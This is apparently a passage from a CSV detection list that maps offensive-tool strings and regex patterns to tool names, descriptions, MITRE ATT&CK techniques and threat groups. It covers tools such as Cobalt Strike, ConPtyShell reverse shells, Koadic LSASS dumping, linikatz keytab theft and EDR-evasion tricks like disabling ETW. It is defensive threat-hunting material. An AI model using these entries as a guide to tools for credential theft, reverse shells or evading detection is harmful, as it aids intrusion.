"*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*common_passwords.txt*",".{0,1000}common_passwords\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*commonspeak_sublist.txt*",".{0,1000}commonspeak_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*communicate_as_backdoor_user.py*",".{0,1000}communicate_as_backdoor_user\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*comnap_##*",".{0,1000}comnap_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*comnode_##*",".{0,1000}comnode_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Company'>Unam Sanctam*",".{0,1000}Company\'\>Unam\sSanctam\<\/Data\>.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*compile_implant*",".{0,1000}compile_implant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Complete log of pspy (may contain commands run in this test):*",".{0,1000}Complete\slog\sof\spspy\s\(may\scontain\scommands\srun\sin\sthis\stest\)\:.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*completedns-get-ns-history*",".{0,1000}completedns\-get\-ns\-history.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*COMPlus_ETWEnabled=0\0\0\0*",".{0,1000}COMPlus_ETWEnabled\=0\\0\\0\\0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*compress_encode_obfs*",".{0,1000}compress_encode_obfs.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ComputerDefaultsUACBypass.lua*",".{0,1000}ComputerDefaultsUACBypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*ComputerDirectory\*.FullDump.txt*",".{0,1000}ComputerDirectory\\.{0,1000}\.FullDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*comsvcs_lsass*",".{0,1000}comsvcs_lsass.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ComsvcsLSASS*",".{0,1000}ComsvcsLSASS.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Con7ext Shell V.2*",".{0,1000}Con7ext\sShell\sV\.2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*conda activate kraken*",".{0,1000}conda\sactivate\skraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*conda create -n kraken python=*",".{0,1000}conda\screate\s\-n\skraken\spython\=.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*config/51pwn/CVE-*",".{0,1000}config\/51pwn\/CVE\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*CONFIG_NETKIT_DEBUG*",".{0,1000}CONFIG_NETKIT_DEBUG.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*config_steal /etc/krb5.conf /etc/krb5.keytab*",".{0,1000}config_steal\s\/etc\/krb5\.conf\s\/etc\/krb5\.keytab.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*Confuser.CLI.Exe*",".{0,1000}Confuser\.CLI\.Exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*Confuser.CLI.exe*",".{0,1000}Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Confuser.DynCipher.dll*",".{0,1000}Confuser\.DynCipher\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Confuser.Renamer.dll*",".{0,1000}Confuser\.Renamer\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*ConfuserEx (CLI)*",".{0,1000}ConfuserEx\s\(CLI\).{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Command-line*",".{0,1000}ConfuserEx\sCommand\-line.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Core*",".{0,1000}ConfuserEx\sCore.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Dynamic Cipher Library*",".{0,1000}ConfuserEx\sDynamic\sCipher\sLibrary.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Protections*",".{0,1000}ConfuserEx\sProtections.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Renamer*",".{0,1000}ConfuserEx\sRenamer.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Runtime*",".{0,1000}ConfuserEx\sRuntime.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx.CLI: *",".{0,1000}ConfuserEx\.CLI\:\s.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*Connect-AzureAD -AadAccessToken -AccountId *",".{0,1000}Connect\-AzureAD\s\-AadAccessToken\s\-AccountId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*connormcgarr/tgtdelegation*",".{0,1000}connormcgarr\/tgtdelegation.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*conptyshell *",".{0,1000}conptyshell\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*ConPtyShell.cs*",".{0,1000}ConPtyShell\.cs.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.exe*",".{0,1000}ConPtyShell\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.git*",".{0,1000}ConPtyShell\.git.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell_dotnet2.exe*",".{0,1000}ConPtyShell_dotnet2\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Console.WriteLine*self executing the payload*",".{0,1000}Console\.WriteLine.{0,1000}self\sexecuting\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*ConsoleHost_history.txt.jasmin*",".{0,1000}ConsoleHost_history\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*-consoleoutput -DomainRecon*",".{0,1000}\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*-consoleoutput -Localrecon*",".{0,1000}\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*contact_harvester*",".{0,1000}contact_harvester.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ContainYourself.cpp*",".{0,1000}ContainYourself\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.exe*",".{0,1000}ContainYourself\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.sln*",".{0,1000}ContainYourself\.sln.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself-main*",".{0,1000}ContainYourself\-main.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc.cpp*",".{0,1000}ContainYourselfPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc.exe*",".{0,1000}ContainYourselfPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc\*",".{0,1000}ContainYourselfPoc\\.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfTempFile.txt*",".{0,1000}ContainYourselfTempFile\.txt.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContentHijacking.swf*",".{0,1000}ContentHijacking\.swf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ConvertFrom-LDAPLogonHours*",".{0,1000}ConvertFrom\-LDAPLogonHours.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python 